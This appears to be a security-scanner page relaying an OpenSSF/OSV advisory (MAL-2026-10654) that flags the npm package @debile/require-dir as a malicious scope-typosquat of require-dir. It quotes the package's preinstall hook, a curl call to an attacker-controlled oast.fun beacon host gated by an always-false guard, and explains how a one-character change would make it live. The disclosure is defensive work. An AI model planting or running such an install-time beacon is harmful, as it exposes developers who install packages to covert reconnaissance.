OSV Malicious Advisory
scanned 3h ago · by OpenSSF/OSVOpenSSF/OSV advisory MAL-2026-10654 confirms this npm version as malicious. Package @debile/require-dir republishes the code of the well-known require-dir package under a different scope. Its package.json preinstall script runs `bash -c 'if [[ 1 == 2 ]]; then curl https://xgtktsypnmotaeqmgvdmsn0l1hg0yewow.oast.fun; fi'`, which stages an Interactsh (oast.fun) out-of-band beacon in the install lifecycle...
Advisory
MAL-2026-10654
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in @debile/require-dir (npm)
Details
Package @debile/require-dir republishes the code of the well-known require-dir package under a different scope. Its package.json preinstall script runs `bash -c 'if [[ 1 == 2 ]]; then curl https://xgtktsypnmotaeqmgvdmsn0l1hg0yewow.oast.fun; fi'`, which stages an Interactsh (oast.fun) out-of-band beacon in the install lifecycle. The curl is gated behind an always-false `[[ 1 == 2 ]]` guard, so no request is actually issued on install of this version, but the preinstall hook, the attacker-controlled OAST subdomain, and the scope-typosquat of a popular package (require-dir) together form a dependency-confusion / install-time recon probe. Flipping a single character in the guard converts the current release into a live install-time beacon to an attacker-controlled interaction server.
Decision reason
OpenSSF Malicious Packages via OSV confirms @debile/require-dir@1.9.1 as malicious (MAL-2026-10654): Malicious code in @debile/require-dir (npm)
References
Source & flagged code
0 flaggedNo flagged code excerpts are attached to this scan.
Findings
1 High
HighOsv Malicious Advisory